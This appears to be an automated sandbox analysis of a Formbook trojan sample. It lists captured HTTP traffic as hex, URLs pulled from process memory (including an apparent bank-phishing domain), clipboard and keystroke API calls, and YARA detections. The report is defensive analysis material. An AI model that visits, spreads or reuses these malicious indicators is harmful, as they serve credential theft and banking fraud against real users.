e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 
a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 10:48:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 
a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 10:48:13 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 
20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: wts/1.7.0Date: Tue, 03 Sep 2024 10:48:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: privateContent-Encoding: gzipStrict-Transport-Security: max-age=31536000Data Raw: 38 36 63 0d 0a 1f 8b 08 00 00 00 00 00 04 0a b5 58 7b 6f db d6 15 ff 7b fe 14 b7 0a 1c 6c 80 28 52 92 e3 87 24 6b 48 fd 40 02 24 5d 10 bb eb 06 04 08 28 f1 ca 24 42 91 2a 79 6d d9 31 0a 38 69 ea 47 12 37 06 da 3c 1c bb 48 b2 26 a9 97 21 56 ba b6 76 6c 37 cd 87 a9 48 c9 7f ed 2b ec 9c 7b 49 89 b6 6c 0f 2d 30 07 91 45 f2 9c df 39 e7 77 5e 97 ce 7d 30 fc 97 a1 f1 bf 5f 1a 21 3a 2b 9b e4 d2 c7 1f 5e 38 3f 44 62 92 2c 7f 92 1e 92 e5 e1 f1 61 f2 b7 73 e3 17 2f 90 64 42 21 63 cc 31 8a 4c 96 47 3e 8a 91 98 ce 58 25 23 cb d5 6a 35 51 4d 27 6c 67 42 1e bf 2c 4f 23 4a 12 d5 82 af 92 cb 75 12 1a d3 62 79 d2 95 e3 56 a6 cb a6 e5 0e 1e 81 90 1c 18 18 10 8a 42 98 aa 1a 2a 31 83 99 34 7f fe fc 18 49 2a e0 46 b3 f6 b2 b1 37 bf ff f5 6a b3 56 23 12 e9 51 7a e0 a6 44 3e b2 19 19 b5 27 2d 2d 27 0b 05 d0 74 d9 8c 49 09 9b a9 d0 c1 18 a3 d3 4c 2e ba 2e 87 fe 40 92 48 57 c1 d6 66 66 cb aa 33 61 58 19 25 5b b2 2d 26 b9 c6 75 9a 49 f4 d1 b2 b8 2c a9 65 c3 9c c9 fc 95 3a 9a 6a a9 f1 b3 8e a1 9a f1 73 d4 9c a2 cc 28 aa 71 57 b5 5c c9 a5 8e 51 ca 7e 46 ba 8a b6 46 db 70 45 db b4 9d cc 29 45 e9 ed 55 a2 e0 c9 44 32 44 af 52 63 42 67 99 82 6d 6a a8 9f 28 da 56 c9 98 b8 ea da 93 4e 91 12 0e 17 71 aa 1f d4 5a a0 0a fc a0 4e c5 89 98 6c 0b 27 13 3d 20 5d b5 1d 4d aa 3a 6a 25 53 70 a8 7a 4d c2 6b 54 9a 34 e3 b6 19 7a 9a 54 2a d3 44 01 66 e1 d7 99 ca b4 78 9e 28 19 8e cb 40 4a 7c 09 64 25 66 57 32 81 4c c9 a0 a6 e6 52 36 5b 51 35 cd b0 26 32 00 01 8f 04 0e 7e 13 d6 b9 e1 c0 bc 6a 9a 3c 4c 77 b2 0c a4 cf 48 10 2e 53 0d 8b 3a e4 30 98 54 b0 19 b3 cb dc 96 c8 0f 37 dd 23 dc 33 e9 04 b5 b4 84 65 4b 74 ba a2 5a 9a 04 c0 2d 37 52 e8 03 3a 02 c2 dc 99 6c 98 60 08 12 ca 24 09 02 e8 
85 00 99 0d 08 4d f3 9f 6c 28 8b ba 0a e9 87 4f 21 7f 35 e2 04 f0 94 25 5d 9c ea 68 fe 22 dc 03 f3 60 40 cd 98 86 75 2d ae 66 a6 0c d7 60 54 0b 4d 29 4a df c8 e8 a8 28 af 28 00 57 d1 ed 29 ea cc 62 a5 4a 1a 2d da 8e ca 0c db ca 58 b6 45 11 52 4f ce b6 cd a4 78 8a c3 e0 c2 ca 18 05 68 94 4c 45 24 93 bc 9e 0f 4b 0e 0d 85 35 a4 a7 0f 08 63 e5 04 c2 41 6d 00 71 21 7e 44 ab e7 80 56 aa 43 0b 93 a0 00 55 9f 9d d2 a1 8f 21 ac aa a1 31 3d 33 d0 db 1d c2 63 42 10 3b 2c a1 5e d0 48 75 13 f1 2b cb 43 0d 1a 30 c6 1c 5a 98 2c ea 94 91 8b 63 b1 78 d8 8f 91 fe 23 5d d0 30 bc e3 90 82 82 5a bc 36 e1 e0 30 80 2a e3 77 cf 0c f5 f7 7d 98 e2 ee 60 dd 51 8b cd 86 8c 70 2f 52 dd d9 8a 0d 89 42 be 1d 6a 02 f1 53 9c f3 44 47 b5 c6 b1 4f 11 a0 5d c0 b3 6d 7b 99 53 68 ff 70 a8 bc 7c a1 9e 5a a1 22 b3 c7 18 ec 40 27 95 a8 ab 22 27 3c 10 8d 42 ff 98 ae 64 d2 12 0b d8 4d 9f e9 ce 96 4c 5b 65 19 bc 19 10 2d 39 7c ce 40 88 98 8d 50 8b df 0c d4 7a d3 07 d4 b0 0a 01 a5 9a d1 0d 4d a3 16 57 83 31 07 77 af c2 7f 17 38 8a 24 f3 aa 2e c6 58 12 22 2a 1b 96 14 b
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: wts/1.7.0Date: Tue, 03 Sep 2024 10:48:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: privateContent-Encoding: gzipStrict-Transport-Security: max-age=31536000
            Source: chkntfs.exe, 00000003.00000002.3536613638.0000000005992000.00000004.10000000.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000002.3536163468.0000000003EC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?TJY8=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJ
            Source: chkntfs.exe, 00000003.00000002.3536613638.0000000004E94000.00000004.10000000.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000002.3536163468.00000000033C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2174561801.0000000036994000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.clientebradesco.online/xsf1?gp=1&js=1&uuid=1725360363.0067147854&other_args=eyJ1cmkiOiAiL
            Source: SCsLZYqthBle.exe, 00000007.00000002.3537571964.00000000054AD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dfbio.net
            Source: SCsLZYqthBle.exe, 00000007.00000002.3537571964.00000000054AD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dfbio.net/yzen/
            Source: firefox.exe, 00000008.00000002.2174561801.0000000036994000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www70.clientebradesco.online/
            Source: chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: chkntfs.exe, 00000003.00000002.3535509329.00000000007DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: chkntfs.exe, 00000003.00000002.3535509329.00000000007DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: chkntfs.exe, 00000003.00000002.3535509329.00000000007DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: chkntfs.exe, 00000003.00000002.3535509329.00000000007B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: chkntfs.exe, 00000003.00000002.3535509329.00000000007B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: chkntfs.exe, 00000003.00000003.2062946532.000000000746F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: chkntfs.exe, 00000003.00000002.3538097911.00000000071E0000.00000004.00000800.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3536613638.0000000005026000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3536613638.000000000566E000.00000004.10000000.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000002.3536163468.0000000003B9E000.00000004.00000001.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000002.3536163468.0000000003556000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009FEAFF
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009FED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_009FED6A
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009FEAFF
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009EAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_009EAA57
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_00A19576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00A19576

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.3535173412.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3536085232.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1885323394.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3537571964.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1884974857.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3536123647.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3536023408.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1889613718.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3535173412.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3536085232.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1885323394.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3537571964.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1884974857.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3536123647.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.3536023408.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1889613718.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: p4LNUqyKZM.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: p4LNUqyKZM.exe, 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c4e97d31-2
            Source: p4LNUqyKZM.exe, 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f3dba2bb-d
            Source: p4LNUqyKZM.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_858fbac3-d
